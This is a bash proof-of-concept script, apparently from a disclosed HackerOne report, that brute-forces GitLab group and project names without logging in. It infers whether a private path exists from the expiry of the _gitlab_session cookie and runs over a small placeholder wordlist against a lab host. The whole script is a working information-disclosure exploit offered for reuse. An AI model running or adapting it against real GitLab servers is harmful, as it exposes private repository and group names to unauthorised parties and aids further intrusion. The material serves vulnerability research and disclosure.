Unauthenticated Information Disclosure in Gitlab allows for enumeration/bruteforce of groups and projects
#!/bin/bash
# Script by TheGroundZero (@DezeStijn)
#
# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/
# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96
#
# Using a difference in behaviour by Gitlab in setting cookies
# it's possible to enumerate/bruteforce groups/projects
# as an unauthenticated user.
#
# This code was written purely for a demo.
# With some reworking this could work with wordlist files
# and even be multithreaded.
#
# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04
# https://hackerone.com/reports/891055
#
# Free to use, but please do refer to this original gist.
#
# https://github.com/TheGroundZero
# https://twitter.com/DezeStijn/
# https://sequr.be/ | http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/
#
# Lab fixtures: space-separated candidate group and project slugs. The
# enumeration loop relies on word-splitting these, so they stay plain strings.
groups='root grouppublic groupinternal groupprivate'
projects='projectpublic projectinternal projectprivate'
# Base URL of the GitLab instance under test (a local lab host).
url='http://gitlab.lab.local'
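#######################################
# Print a coloured marker saying whether a tested path is believed to exist.
# Arguments: $1 - 1 if the path is believed to exist, anything else otherwise
#            $2 - the URL that was tested
# Outputs:   one line on stdout: green [+] or red [-] followed by the URL
#######################################
print_exists() {
  local exists=$1
  local target=$2
  # printf rather than echo -e: echo's option/escape handling varies between
  # shells, and a value starting with '-' would be read as an echo option.
  if [[ "$exists" -eq 1 ]]; then
    printf '\e[92m[+]\e[0m %s\n' "$target"
  else
    printf '\e[91m[-]\e[0m %s\n' "$target"
  fi
}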
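#######################################
# Classify one GitLab path from an unauthenticated request.
# A 200 response is reported as an existing (public) path. Otherwise the
# request is repeated with the cookie jar sent to stdout: a _gitlab_session
# cookie whose expiry (cookie-jar column 5) is greater than 0 is reported as
# "does not exist"; no such cookie, or an expiry of 0, is reported as "exists".
# This is the cookie-setting difference the header describes.
# Globals:   none written (status/expire are local)
# Arguments: $1 - full URL to test
# Outputs:   one result line via print_exists
#######################################
check_cookie() {
  local target=$1
  local status expire
  status=$(curl -s -o /dev/null -w '%{http_code}' "$target")
  #echo "[i] HTTP code = $status"
  if [[ "$status" == 200 ]]; then
    print_exists 1 "$target"
    return 0
  fi
  # Only the first matching cookie line is used; a multi-line value would
  # break the numeric comparison below.
  expire=$(curl --junk-session-cookies --cookie-jar - "$target" 2>/dev/null \
    | awk '/_gitlab_session/ {print $5; exit}')
  #echo "[i] Expire = $expire"
  # The original compared an unquoted, possibly empty value with -gt, which
  # printed a test(1) error and then fell into the "exists" branch; the empty
  # case is now handled explicitly with the same outcome.
  if [[ -n "$expire" && "$expire" -gt 0 ]]; then
    print_exists 0 "$target"
  else
    print_exists 1 "$target"
  fi
}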
#######################################
# Walk every candidate group, then every candidate project beneath it, and
# report each path through check_cookie. Relies on word-splitting of the
# space-separated $groups and $projects lists.
# Globals:   groups, projects, url (read)
#######################################
main() {
  local group project
  for group in $groups; do
    echo "[*] Group: $group"
    #echo "[*] Testing: $url/$group"
    check_cookie "$url/$group"
    for project in $projects; do
      echo "[*] Project: $project"
      #echo "[*] Testing: $url/$group/$project"
      check_cookie "$url/$group/$project"
    done
    echo ""
  done
}
main "$@"